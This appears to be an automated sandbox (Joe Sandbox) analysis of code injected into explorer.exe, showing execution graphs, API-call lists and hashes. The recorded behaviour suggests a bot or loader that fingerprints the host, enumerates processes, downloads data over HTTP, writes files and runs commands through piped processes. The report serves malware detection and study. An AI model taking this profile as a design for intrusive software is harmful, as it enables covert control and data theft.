                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:5.6%
                                                                                                                      Total number of Nodes:764
                                                                                                                      Total number of Limit Nodes:12
                                                                                                                       execution_graph (node/edge dump omitted; rendered graph in the original). Functions in the 13a30b0-13aaab8 range reach the following APIs:
                                                                                                                       • WinINet HTTP: InternetCrackUrlA, InternetOpenW, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, InternetReadFile, InternetCloseHandle
                                                                                                                       • Host and environment information: GetCurrentProcess, IsWow64Process, RtlGetVersion, GetVersionExW, GetAdaptersInfo, GetComputerNameExA, GetUserNameA, FindFirstVolumeW, GetVolumeInformationW, FindVolumeClose, GetCurrentProcessId, wsprintfA
                                                                                                                       • Process enumeration: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle
                                                                                                                       • Mutex: CreateMutexW followed by GetLastError
                                                                                                                       • Dynamic API resolution and DLL loading: GetModuleHandleW, GetProcAddress, GetSystemDirectoryW, FindFirstFileW, FindNextFileW, LoadLibraryW
                                                                                                                       • Memory: NtAllocateVirtualMemory, NtFreeVirtualMemory, VirtualQuery, new[]
                                                                                                                       • Delays, threads and randomness: NtDelayExecution, CreateThread, GetExitCodeThread, GetCursorPos, GetTickCount, RtlRandom
3015->3014 3016->3017 3017->2966 3019 13a4300 HttpSendRequestA 3018->3019 3019->3017 3021 13aa970 3020->3021 3022 13a958c NtAllocateVirtualMemory 3021->3022 3023 13aa9a7 3021->3023 3024 13aa9d7 3022->3024 3023->2995 3024->3023 3025 13aa064 NtAllocateVirtualMemory 3024->3025 3026 13aaa09 3025->3026 3027 13a958c NtAllocateVirtualMemory 3026->3027 3028 13aaa28 3027->3028 3028->3023 3029 13a6814 NtFreeVirtualMemory 3028->3029 3029->3023 3056 13a32e7 3030->3056 3031 13a35b8 3033 13a35bf 3031->3033 3034 13a361d ExitProcess 3031->3034 3032 13a357d 3035 13a35f0 3032->3035 3036 13a3584 3032->3036 3038 13a35ca 3033->3038 3039 13a3650 3033->3039 3037 13a35b3 3034->3037 3057 13a6178 3035->3057 3041 13a358f 3036->3041 3042 13a3667 3036->3042 3037->2995 3038->3037 3194 13a62d0 3038->3194 3130 13a36a4 3039->3130 3043 13a359a 3041->3043 3044 13a363b 3041->3044 3174 13a1a08 3042->3174 3047 13a3649 3043->3047 3048 13a35a5 3043->3048 3097 13a1c38 CreateToolhelp32Snapshot 3044->3097 3129 13a2118 CreateThread 3047->3129 3050 13a35ac 3048->3050 3051 13a3607 3048->3051 3050->3037 3082 13a5c48 3050->3082 3070 13a5e20 3051->3070 3056->3031 3056->3032 3058 13a6197 3057->3058 3059 13a61a4 MultiByteToWideChar 3058->3059 3205 13a5f64 3059->3205 3062 13a62b3 3063 13a62ac 3062->3063 3064 13a6814 NtFreeVirtualMemory 3062->3064 3063->3037 3064->3063 3065 13a621f VirtualAlloc 3066 13a6252 3065->3066 3067 13a958c NtAllocateVirtualMemory 3066->3067 3068 13a625c CreateThread 3067->3068 3069 13a6814 NtFreeVirtualMemory 3068->3069 3069->3063 3257 13a686c 3070->3257 3072 13a5e43 3080 13a5e50 3072->3080 3265 13a71b8 3072->3265 3075 13a6814 NtFreeVirtualMemory 3076 13a5ebf 3075->3076 3077 13a5ee7 MultiByteToWideChar 3076->3077 3078 13a5f64 12 API calls 3077->3078 3079 13a5f2f 3078->3079 3079->3080 3271 13a9984 3079->3271 3080->3037 3083 13a5c87 3082->3083 3084 13a686c 4 API calls 3083->3084 3086 13a5cb3 3084->3086 3085 13a5cc0 3085->3037 3086->3085 3087 13a71b8 3 API calls 3086->3087 3088 13a5d0a wsprintfW 
3087->3088 3089 13a6814 NtFreeVirtualMemory 3088->3089 3090 13a5d2f 3089->3090 3091 13a5d54 MultiByteToWideChar 3090->3091 3092 13a5f64 12 API calls 3091->3092 3093 13a5d99 3092->3093 3094 13a5db9 MultiByteToWideChar 3093->3094 3094->3085 3095 13a5ded 3094->3095 3095->3085 3277 13a9a50 3095->3277 3098 13a958c NtAllocateVirtualMemory 3097->3098 3099 13a1c87 3098->3099 3100 13a9f08 3 API calls 3099->3100 3101 13a1cd0 3100->3101 3102 13a1cdc Process32First 3101->3102 3103 13a20f6 3101->3103 3104 13a1d06 Process32Next 3102->3104 3105 13a1d27 3102->3105 3106 13a9f08 3 API calls 3103->3106 3104->3104 3104->3105 3108 13a958c NtAllocateVirtualMemory 3105->3108 3107 13a2107 3106->3107 3107->3037 3109 13a1d37 Process32First 3108->3109 3110 13a1d53 3109->3110 3111 13a1da0 Process32First 3109->3111 3112 13a1d5b Process32Next 3110->3112 3113 13a20e1 3111->3113 3118 13a1dbb 3111->3118 3112->3111 3112->3112 3114 13a6814 NtFreeVirtualMemory 3113->3114 3115 13a20eb CloseHandle 3114->3115 3115->3103 3116 13a20c6 Process32Next 3116->3113 3116->3118 3117 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3117->3118 3118->3116 3118->3117 3119 13a1edb wsprintfA 3118->3119 3120 13a9f08 3 API calls 3119->3120 3122 13a1f08 3120->3122 3121 13a9f08 3 API calls 3121->3122 3122->3121 3123 13a1f81 wsprintfA 3122->3123 3124 13a9f08 3 API calls 3123->3124 3127 13a1fae 3124->3127 3126 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3126->3127 3127->3126 3128 13a9f08 3 API calls 3127->3128 3286 13a14d8 CreateToolhelp32Snapshot 3127->3286 3128->3116 3129->3037 3131 13a36e4 3130->3131 3132 13a958c NtAllocateVirtualMemory 3131->3132 3133 13a3710 3132->3133 3134 13a958c NtAllocateVirtualMemory 3133->3134 3135 13a371f 3134->3135 3136 13a686c 4 API calls 3135->3136 3138 13a372e 3136->3138 3137 13a373b 3137->3037 3138->3137 3139 13a71b8 3 API calls 3138->3139 3140 13a37d1 wsprintfW 3139->3140 3141 13a37fb 3140->3141 3142 13a3822 wsprintfW 3141->3142 3143 13a384c 3142->3143 
3144 13aa0b0 NtAllocateVirtualMemory 3143->3144 3145 13a3858 3144->3145 3146 13a5bb8 3 API calls 3145->3146 3147 13a3867 3146->3147 3148 13a9f50 3 API calls 3147->3148 3149 13a38a0 3148->3149 3150 13a9f08 3 API calls 3149->3150 3164 13a38ed 3150->3164 3152 13a6814 NtFreeVirtualMemory 3153 13a3b86 3152->3153 3154 13a6814 NtFreeVirtualMemory 3153->3154 3155 13a3b99 3154->3155 3157 13a6814 NtFreeVirtualMemory 3155->3157 3156 13a71b8 3 API calls 3158 13a393f wsprintfW 3156->3158 3159 13a3bac 3157->3159 3160 13a396f 3158->3160 3161 13a6814 NtFreeVirtualMemory 3159->3161 3162 13a3979 MultiByteToWideChar 3160->3162 3161->3137 3163 13a5f64 12 API calls 3162->3163 3163->3164 3164->3156 3165 13a71b8 3 API calls 3164->3165 3171 13a39c9 3164->3171 3172 13a3b31 wsprintfW 3164->3172 3302 13a650c 3164->3302 3166 13a3a0e wsprintfW 3165->3166 3168 13a3a3b 3166->3168 3167 13a3a62 wsprintfW 3167->3168 3168->3167 3169 13a3aa1 MultiByteToWideChar 3168->3169 3170 13a5f64 12 API calls 3169->3170 3170->3164 3171->3152 3173 13a9a50 5 API calls 3172->3173 3173->3164 3175 13a958c NtAllocateVirtualMemory 3174->3175 3176 13a1a1b 3175->3176 3177 13a9f08 3 API calls 3176->3177 3178 13a1a5b 3177->3178 3312 13a68f8 3178->3312 3180 13a1a6e 3181 13a1bdb 3180->3181 3184 13a9f08 3 API calls 3180->3184 3182 13a1bed 3181->3182 3183 13a6814 NtFreeVirtualMemory 3181->3183 3185 13a9f08 3 API calls 3182->3185 3183->3182 3186 13a1aba FindFirstFileA 3184->3186 3187 13a1c28 3185->3187 3186->3181 3193 13a1ade 3186->3193 3187->3037 3188 13a1bb5 FindNextFileA 3189 13a1bd0 FindClose 3188->3189 3188->3193 3189->3181 3190 13a9f08 3 API calls 3190->3193 3191 13a1b80 wsprintfA 3192 13a9f08 3 API calls 3191->3192 3192->3193 3193->3188 3193->3190 3193->3191 3195 13a62eb 3194->3195 3196 13a62f8 MultiByteToWideChar 3195->3196 3197 13a5f64 12 API calls 3196->3197 3198 13a6349 3197->3198 3199 13a958c NtAllocateVirtualMemory 3198->3199 3204 13a6408 3198->3204 3200 13a637e 3199->3200 3201 13a958c NtAllocateVirtualMemory 
3200->3201 3202 13a63a1 CreateThread 3201->3202 3203 13a6814 NtFreeVirtualMemory 3202->3203 3203->3204 3204->3037 3214 13a5fa4 3205->3214 3207 13a6008 3208 13a613d 3207->3208 3209 13a6814 NtFreeVirtualMemory 3207->3209 3210 13a6148 3208->3210 3211 13a6814 NtFreeVirtualMemory 3208->3211 3209->3208 3210->3062 3210->3065 3211->3210 3212 13aa0b0 NtAllocateVirtualMemory 3212->3214 3214->3207 3214->3212 3216 13a75e8 3214->3216 3228 13a5bb8 3214->3228 3240 13a67a0 3214->3240 3217 13a7627 InternetOpenW 3216->3217 3218 13a7662 3217->3218 3219 13a7667 InternetOpenUrlW 3217->3219 3221 13a7791 3218->3221 3222 13a7786 InternetCloseHandle 3218->3222 3219->3218 3227 13a76a3 3219->3227 3220 13a76ae InternetReadFile 3220->3227 3223 13a7799 InternetCloseHandle 3221->3223 3224 13a77a4 3221->3224 3222->3221 3223->3224 3224->3214 3225 13a958c NtAllocateVirtualMemory 3225->3227 3226 13a97f4 3 API calls 3226->3227 3227->3218 3227->3220 3227->3225 3227->3226 3246 13a7840 3228->3246 3231 13aa01c 3 API calls 3232 13a5bf3 3231->3232 3233 13aa01c 3 API calls 3232->3233 3235 13a5c2e 3232->3235 3236 13a5c09 3233->3236 3234 13a5bdb 3234->3214 3235->3234 3237 13a6814 NtFreeVirtualMemory 3235->3237 3236->3235 3238 13a5c0d 3236->3238 3237->3234 3239 13a6814 NtFreeVirtualMemory 3238->3239 3239->3234 3251 13a6618 3240->3251 3243 13a67df 3243->3214 3247 13aa0b0 NtAllocateVirtualMemory 3246->3247 3249 13a7860 3247->3249 3248 13a5bd7 3248->3231 3248->3234 3249->3248 3250 13a6814 NtFreeVirtualMemory 3249->3250 3250->3248 3252 13a6659 3251->3252 3253 13a666b RtlInitUnicodeString NtCreateFile 3252->3253 3254 13a6711 3253->3254 3254->3243 3255 13a6728 NtWriteFile 3254->3255 3256 13a6790 NtClose 3255->3256 3256->3243 3258 13a9674 3257->3258 3259 13a6886 SHGetFolderPathW 3258->3259 3260 13a68af 3259->3260 3261 13aa0b0 NtAllocateVirtualMemory 3260->3261 3262 13a68bb 3261->3262 3263 13a68c8 3262->3263 3264 13aa01c 3 API calls 3262->3264 3263->3072 3264->3263 3266 13a9674 3265->3266 3267 13a71cb GetCursorPos 
3266->3267 3268 13a5e9a wsprintfW 3267->3268 3269 13a71de GetTickCount 3267->3269 3268->3075 3276 13a97cc RtlRandom 3269->3276 3272 13a999e 3271->3272 3273 13a99d6 CreateProcessW 3272->3273 3274 13a9a2a CloseHandle CloseHandle 3273->3274 3275 13a9a26 3273->3275 3274->3275 3275->3080 3276->3268 3278 13a9a70 3277->3278 3279 13a9b28 3278->3279 3280 13a9ace 3278->3280 3282 13a9b5d wsprintfW 3279->3282 3281 13a9b03 wsprintfW 3280->3281 3283 13a9b78 CreateProcessW 3281->3283 3282->3283 3284 13a9bcb 3283->3284 3285 13a9bcf CloseHandle CloseHandle 3283->3285 3284->3085 3285->3284 3287 13a185d 3286->3287 3288 13a1530 Process32First 3286->3288 3287->3127 3288->3287 3291 13a1556 3288->3291 3289 13a1842 Process32Next 3289->3287 3289->3291 3290 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3290->3291 3291->3289 3291->3290 3292 13a167e wsprintfA 3291->3292 3293 13a9f08 3 API calls 3292->3293 3295 13a16ae 3293->3295 3294 13a9f08 3 API calls 3294->3295 3295->3294 3296 13a1718 wsprintfA 3295->3296 3297 13a9f08 3 API calls 3296->3297 3300 13a1748 3297->3300 3298 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3298->3300 3299 13a14d8 3 API calls 3299->3300 3300->3298 3300->3299 3301 13a9f08 3 API calls 3300->3301 3301->3289 3303 13a6532 3302->3303 3304 13a6544 RtlInitUnicodeString 3303->3304 3310 13a641c GetFileAttributesW 3304->3310 3307 13a658b 3307->3164 3308 13a6592 NtCreateFile 3308->3307 3309 13a65f7 NtClose 3308->3309 3309->3307 3311 13a6441 3310->3311 3311->3307 3311->3308 3313 13a9674 3312->3313 3314 13a6912 SHGetFolderPathA 3313->3314 3315 13a693b 3314->3315 3316 13aa064 NtAllocateVirtualMemory 3315->3316 3318 13a6947 3316->3318 3317 13a6954 3317->3180 3318->3317 3319 13a9f08 3 API calls 3318->3319 3319->3317 3320 13a32b8 3323 13a3288 3320->3323 3324 13a30b0 123 API calls 3323->3324 3325 13a3291 3324->3325 3326 13a32af 3325->3326 3328 13aa5cc NtDelayExecution 3325->3328 3328->3325 3369 13a3248 3370 13a326b 3369->3370 3371 13a3269 
3369->3371 3372 13a3288 123 API calls 3370->3372 3372->3371 3364 13a991c 3365 13a9976 3364->3365 3366 13a9930 3364->3366 3367 13a994e VirtualFree 3366->3367 3368 13a6814 NtFreeVirtualMemory 3367->3368 3368->3365 3373 13a2200 3374 13a2245 3373->3374 3432 13a221e 3373->3432 3375 13a958c NtAllocateVirtualMemory 3374->3375 3376 13a224f 3375->3376 3376->3432 3491 13a1030 3376->3491 3378 13a2302 3379 13a1030 21 API calls 3378->3379 3380 13a239a 3379->3380 3381 13a1030 21 API calls 3380->3381 3382 13a2433 3381->3382 3383 13a1030 21 API calls 3382->3383 3384 13a24cc 3383->3384 3385 13a1030 21 API calls 3384->3385 3386 13a2565 3385->3386 3387 13a1030 21 API calls 3386->3387 3388 13a25fe 3387->3388 3389 13a1030 21 API calls 3388->3389 3390 13a2697 3389->3390 3391 13a1030 21 API calls 3390->3391 3392 13a2730 3391->3392 3393 13a1030 21 API calls 3392->3393 3394 13a27c9 3393->3394 3395 13a1030 21 API calls 3394->3395 3396 13a2862 3395->3396 3397 13a1030 21 API calls 3396->3397 3398 13a28fb 3397->3398 3399 13a958c NtAllocateVirtualMemory 3398->3399 3400 13a290e 3399->3400 3401 13a29d2 3400->3401 3402 13a5650 NtAllocateVirtualMemory 3400->3402 3400->3432 3403 13a5650 NtAllocateVirtualMemory 3401->3403 3404 13a2a73 3401->3404 3411 13a295f 3402->3411 3413 13a2a00 3403->3413 3405 13a5650 NtAllocateVirtualMemory 3404->3405 3406 13a2b14 3404->3406 3415 13a2aa1 3405->3415 3407 13a5650 NtAllocateVirtualMemory 3406->3407 3408 13a2bb5 3406->3408 3421 13a2b42 3407->3421 3409 13a2c56 3408->3409 3410 13a5650 NtAllocateVirtualMemory 3408->3410 3412 13a2cf7 3409->3412 3414 13a5650 NtAllocateVirtualMemory 3409->3414 3424 13a2be3 3410->3424 3411->3401 3420 13a9f08 3 API calls 3411->3420 3416 13a5650 NtAllocateVirtualMemory 3412->3416 3417 13a2d98 3412->3417 3413->3404 3428 13a9f08 3 API calls 3413->3428 3434 13a2c84 3414->3434 3415->3406 3430 13a9f08 3 API calls 3415->3430 3436 13a2d25 3416->3436 3418 13a2e39 3417->3418 3422 13a5650 NtAllocateVirtualMemory 3417->3422 3423 13a5650 
NtAllocateVirtualMemory 3418->3423 3427 13a2eda 3418->3427 3419 13a3034 3513 13a1868 3419->3513 3425 13a29b9 3420->3425 3421->3408 3440 13a9f08 3 API calls 3421->3440 3445 13a2dc6 3422->3445 3448 13a2e67 3423->3448 3424->3409 3442 13a9f08 3 API calls 3424->3442 3431 13a9f08 3 API calls 3425->3431 3429 13a2f87 3427->3429 3433 13a5650 NtAllocateVirtualMemory 3427->3433 3435 13a2a5a 3428->3435 3429->3419 3437 13a5650 NtAllocateVirtualMemory 3429->3437 3438 13a2afb 3430->3438 3439 13a29c8 3431->3439 3457 13a2f08 3433->3457 3434->3412 3451 13a9f08 3 API calls 3434->3451 3441 13a9f08 3 API calls 3435->3441 3436->3417 3454 13a9f08 3 API calls 3436->3454 3463 13a2fb5 3437->3463 3443 13a9f08 3 API calls 3438->3443 3444 13a6814 NtFreeVirtualMemory 3439->3444 3446 13a2b9c 3440->3446 3447 13a2a69 3441->3447 3449 13a2c3d 3442->3449 3450 13a2b0a 3443->3450 3444->3401 3445->3418 3460 13a9f08 3 API calls 3445->3460 3452 13a9f08 3 API calls 3446->3452 3453 13a6814 NtFreeVirtualMemory 3447->3453 3448->3427 3468 13a9f08 3 API calls 3448->3468 3455 13a9f08 3 API calls 3449->3455 3456 13a6814 NtFreeVirtualMemory 3450->3456 3458 13a2cde 3451->3458 3459 13a2bab 3452->3459 3453->3404 3464 13a2d7f 3454->3464 3465 13a2c4c 3455->3465 3456->3406 3457->3429 3471 13a9f08 3 API calls 3457->3471 3461 13a9f08 3 API calls 3458->3461 3462 13a6814 NtFreeVirtualMemory 3459->3462 3466 13a2e20 3460->3466 3467 13a2ced 3461->3467 3462->3408 3463->3419 3478 13a9f08 3 API calls 3463->3478 3469 13a9f08 3 API calls 3464->3469 3470 13a6814 NtFreeVirtualMemory 3465->3470 3472 13a9f08 3 API calls 3466->3472 3473 13a6814 NtFreeVirtualMemory 3467->3473 3474 13a2ec1 3468->3474 3475 13a2d8e 3469->3475 3470->3409 3476 13a2f68 3471->3476 3477 13a2e2f 3472->3477 3473->3412 3479 13a9f08 3 API calls 3474->3479 3480 13a6814 NtFreeVirtualMemory 3475->3480 3481 13a9f08 3 API calls 3476->3481 3482 13a6814 NtFreeVirtualMemory 3477->3482 3483 13a3015 3478->3483 3484 13a2ed0 3479->3484 3480->3417 3485 13a2f7a 3481->3485 
3482->3418 3486 13a9f08 3 API calls 3483->3486 3487 13a6814 NtFreeVirtualMemory 3484->3487 3488 13a6814 NtFreeVirtualMemory 3485->3488 3489 13a3027 3486->3489 3487->3427 3488->3429 3490 13a6814 NtFreeVirtualMemory 3489->3490 3490->3419 3492 13a10b0 3491->3492 3493 13a10c2 6 API calls 3492->3493 3539 13a1000 3493->3539 3495 13a11ff CreateProcessW 3496 13a958c NtAllocateVirtualMemory 3495->3496 3497 13a1265 3496->3497 3498 13a958c NtAllocateVirtualMemory 3497->3498 3499 13a12a2 3498->3499 3500 13a14b4 3499->3500 3502 13a146c TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 3499->3502 3503 13a12cd PeekNamedPipe 3499->3503 3504 13a1385 PeekNamedPipe 3499->3504 3506 13a1435 GetExitCodeProcess 3499->3506 3509 13a1334 ReadFile 3499->3509 3511 13a13e4 ReadFile 3499->3511 3540 13aa5cc NtDelayExecution 3499->3540 3501 13a14c6 3500->3501 3505 13a6814 NtFreeVirtualMemory 3500->3505 3501->3378 3502->3500 3503->3499 3503->3504 3504->3499 3504->3506 3505->3501 3506->3499 3507 13a145b 3506->3507 3507->3502 3510 13a9f08 3 API calls 3509->3510 3510->3504 3512 13a9f08 3 API calls 3511->3512 3512->3506 3515 13a187d 3513->3515 3538 13a19f7 3513->3538 3514 13a18aa 3517 13a18ca 3514->3517 3518 13a6814 NtFreeVirtualMemory 3514->3518 3515->3514 3516 13a6814 NtFreeVirtualMemory 3515->3516 3515->3538 3516->3514 3519 13a18ea 3517->3519 3520 13a6814 NtFreeVirtualMemory 3517->3520 3518->3517 3521 13a190a 3519->3521 3522 13a6814 NtFreeVirtualMemory 3519->3522 3520->3519 3523 13a192a 3521->3523 3524 13a6814 NtFreeVirtualMemory 3521->3524 3522->3521 3525 13a194a 3523->3525 3526 13a6814 NtFreeVirtualMemory 3523->3526 3524->3523 3527 13a196a 3525->3527 3528 13a6814 NtFreeVirtualMemory 3525->3528 3526->3525 3529 13a198a 3527->3529 3530 13a6814 NtFreeVirtualMemory 3527->3530 3528->3527 3531 13a19aa 3529->3531 3532 13a6814 NtFreeVirtualMemory 3529->3532 3530->3529 3533 13a19ca 3531->3533 3534 13a6814 NtFreeVirtualMemory 3531->3534 3532->3531 3535 13a19ea 3533->3535 3537 13a6814 
NtFreeVirtualMemory 3533->3537 3534->3533 3536 13a6814 NtFreeVirtualMemory 3535->3536 3536->3538 3537->3535 3538->3432 3539->3495 3540->3499 3329 13a7774 3330 13a7662 3329->3330 3331 13a7627 InternetOpenW 3329->3331 3333 13a7791 3330->3333 3334 13a7786 InternetCloseHandle 3330->3334 3331->3330 3332 13a7667 InternetOpenUrlW 3331->3332 3332->3330 3338 13a76a3 3332->3338 3335 13a7799 InternetCloseHandle 3333->3335 3336 13a77a4 3333->3336 3334->3333 3335->3336 3337 13a76ae InternetReadFile 3337->3338 3338->3330 3338->3337 3339 13a958c NtAllocateVirtualMemory 3338->3339 3340 13a97f4 3 API calls 3338->3340 3339->3338 3340->3338 3341 13a9bf4 3342 13a9c75 3341->3342 3343 13a9c12 3341->3343 3344 13a9c3e CreateFileMappingA 3343->3344 3344->3342 3345 13a9c7c MapViewOfFile 3344->3345 3345->3342 3348 13a9caf 3345->3348 3346 13a9d7b VirtualFree 3347 13a6814 NtFreeVirtualMemory 3346->3347 3350 13a9dac UnmapViewOfFile CloseHandle 3347->3350 3348->3346 3349 13a958c NtAllocateVirtualMemory 3348->3349 3351 13a9ce5 3349->3351 3350->3342 3352 13a9f08 3 API calls 3351->3352 3353 13a9d37 3352->3353 3354 13a9f08 3 API calls 3353->3354 3355 13a9d49 3354->3355 3356 13aa064 NtAllocateVirtualMemory 3355->3356 3357 13a9d5f 3356->3357 3358 13a6814 NtFreeVirtualMemory 3357->3358 3358->3346 3359 13a6464 3360 13a647b 3359->3360 3361 13a648a RtlInitUnicodeString NtOpenFile 3360->3361 3362 13a64ef 3361->3362 3363 13a64f3 NtClose 3361->3363 3363->3362

Control-flow Graph (function 13a6984; interactive executed/not-executed graph not reproduced)
APIs
• Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
• GetAdaptersInfo.IPHLPAPI ref: 013A69D0
• GetAdaptersInfo.IPHLPAPI ref: 013A6A07
• wsprintfA.USER32 ref: 013A6A50
• wsprintfA.USER32 ref: 013A6B3B
• wsprintfA.USER32 ref: 013A6B9F
Strings
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2074107575-252678980
• Opcode ID: bb5e8bd85d81c0865c55c292e8f5dc328cf4844b27724cf06f1d0ac9af01af05
• Instruction ID: ea748272eb98de524d87c14316dcdf98ff2926b8f84bfa7150cf5e8e9cd05992
• Opcode Fuzzy Hash: bb5e8bd85d81c0865c55c292e8f5dc328cf4844b27724cf06f1d0ac9af01af05
• Instruction Fuzzy Hash: 9CA1BC76209B84C6DB60CB19F49439AB7A4F788798F845525EACE83B68EF3CC544CB40

Control-flow Graph (function 13a5904; interactive executed/not-executed graph not reproduced)
APIs
• GetAdaptersInfo.IPHLPAPI ref: 013A592C
• Part of subcall function 013A958C: NtAllocateVirtualMemory.NTDLL ref: 013A95C2
• GetAdaptersInfo.IPHLPAPI ref: 013A5957
Strings
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2718687846-252678980
• Opcode ID: 4e81b31fdadc980245d5dae740b1421522dfc600825620bc8eff45fa53ea0adf
• Instruction ID: 533e77ec1c8accba92ad9e0c052393bc57375adab054244ab145f9fc8551c630
• Opcode Fuzzy Hash: 4e81b31fdadc980245d5dae740b1421522dfc600825620bc8eff45fa53ea0adf
• Instruction Fuzzy Hash: B901B372508B04C6DB309B15E45435ABBA0F7C97ACF840629E6CD4BB68DB3CC684CF44

Control-flow Graph (function 13a7318; interactive executed/not-executed graph not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
Yara matches
Similarity
• API ID: NameUserwsprintf
• String ID: jones
• API String ID: 54179028-3844744938
• Opcode ID: a005ed5bfa22ce0381172d728ca994239463a66100743b26af83be9f7c987c3c
• Instruction ID: 1d3cb8474f7d7bb0cdcbb5399216d199b34e0810e65074ff777ec01d6188696c
• Opcode Fuzzy Hash: a005ed5bfa22ce0381172d728ca994239463a66100743b26af83be9f7c987c3c
• Instruction Fuzzy Hash: 56F07D71224A8792EB60DF54E8847E97721FF90748FC05121A1CE56DA8DF7DC70ADB41

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 181 13a8ba8-13a8bc3 call 13a72cc 184 13a8bcc-13a8be0 call 13a96d0 181->184 185 13a8bc5-13a8bc7 181->185 189 13a8bee-13a8bf3 184->189 190 13a8be2-13a8bec 184->190 186 13a8ccc-13a8cd3 185->186 191 13a8bf8-13a8c09 call 13aa01c 189->191 190->191 194 13a8c0b-13a8c0d 191->194 195 13a8c12-13a8c4b call 13a9674 FindFirstFileW 191->195 194->186 198 13a8cbd-13a8cc7 call 13a6814 195->198 199 13a8c4d-13a8c52 195->199 198->186 199->198 201 13a8c54-13a8c69 FindNextFileW 199->201 203 13a8c6b 201->203 204 13a8c6d-13a8c73 201->204 203->198 205 13a8c77-13a8ca4 call 13aa1e8 call 13a5ac0 204->205 206 13a8c75 204->206 211 13a8cbb 205->211 212 13a8ca6-13a8cb9 LoadLibraryW 205->212 206->198 211->199 212->198
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectorySystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2188284642-0
                                                                                                                      • Opcode ID: 389ec66785aca711388ae230cdc2665dda1444623b8b65d447f8ab9259c927d9
                                                                                                                      • Instruction ID: 1217d6429fcfefb09af751b190a6887a520a9315d3aa6aee4e0f609521ee502c
                                                                                                                      • Opcode Fuzzy Hash: 389ec66785aca711388ae230cdc2665dda1444623b8b65d447f8ab9259c927d9
                                                                                                                      • Instruction Fuzzy Hash: 15312372219A85D6DB20DB18F48835AB764F7D4369FD00765E6EE86AA8DF3CC544CF00

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 223 13a958c-13a95ca NtAllocateVirtualMemory 224 13a95db-13a95e4 223->224 225 13a95cc-13a95d6 call 13a9674 223->225 225->224
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL ref: 013A95C2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 2167126740-2766056989
                                                                                                                      • Opcode ID: d9a223498249f4c3c090322a89b85a3a438a55c178209e3767addec7786668fc
                                                                                                                      • Instruction ID: f9075bad76e465ac2dc8dca32a5e2664ba5d71de79b1237c57edb27d54cc1c13
                                                                                                                      • Opcode Fuzzy Hash: d9a223498249f4c3c090322a89b85a3a438a55c178209e3767addec7786668fc
                                                                                                                      • Instruction Fuzzy Hash: FEE0C9B2228A8582D750DF69E45474BB761FB857B8F805305FAAA16BE8CB7CC108CF00

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 227 13a4004-13a404b 228 13a404d-13a406d InternetReadFile 227->228 229 13a406f-13a4074 228->229 230 13a40cd 228->230 229->230 232 13a4076-13a4093 call 13a98b0 229->232 231 13a40d2-13a40da 230->231 235 13a4099-13a40cb call 13a95e8 232->235 236 13a4095-13a4097 232->236 235->228 236->231
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_13a0000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileInternetRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 778332206-0
                                                                                                                      • Opcode ID: 97b87ae50f1853fbe220b74755e22490f7afaba21d5baf80783810c8043fd314
                                                                                                                      • Instruction ID: c2c454f03b9dd31565520ac6eec40b5094b6add9a5b0fd0fa7f16c609361e6cf
                                                                                                                      • Opcode Fuzzy Hash: 97b87ae50f1853fbe220b74755e22490f7afaba21d5baf80783810c8043fd314
                                                                                                                      • Instruction Fuzzy Hash: 37112C3232868587D760CA19E4547AAA7E5F788788F844125EB8D83B58EF7DC615CF00

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 243 13a6814-13a682c 244 13a682e-13a684b NtFreeVirtualMemory 243->244 245 13a684f-13a6853 243->245 244->245
                                                                                                                      APIs
